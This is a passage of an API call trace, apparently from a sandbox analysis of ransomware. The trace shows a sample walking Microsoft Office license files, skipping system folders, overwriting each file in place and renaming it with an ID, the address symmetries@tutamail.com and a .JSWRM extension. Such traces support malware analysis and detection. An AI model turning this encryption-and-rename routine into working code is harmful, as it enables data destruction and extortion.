office\\root\\licenses16\\proplusr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0108.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0108.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0108.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0108.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0108.947] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea20fde3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea20fde3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea2a87f0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Grace-ul-oob.xrm-ms", cAlternateFileName="PR1619~1.XRM")) returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.947] lstrcmpiW (lpString1="ProPlusR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0108.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2412e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0108.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0108.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0108.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0108.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0108.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0108.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.948] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11599) returned 1 [0108.949] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0108.949] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0108.951] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.951] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0108.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.951] CloseHandle (hObject=0x45c) returned 1 [0108.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0108.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0108.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0108.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0108.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0108.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0108.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0108.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0108.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0108.956] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea20fde3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea20fde3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea4e4aeb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PR1EA9~1.XRM")) returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.957] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0108.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0108.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10643) returned 1 [0108.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0108.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0108.960] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.960] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0108.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.960] CloseHandle (hObject=0x45c) returned 1 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0108.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0108.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0108.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.961] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0108.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0108.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0108.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0108.962] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea1774fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea25c28b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PR1A81~1.XRM")) returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.962] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0108.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241308, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0108.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0108.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0108.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.963] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24302) returned 1 [0108.963] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0108.963] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0108.966] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.966] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0108.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.967] CloseHandle (hObject=0x45c) returned 1 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0108.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 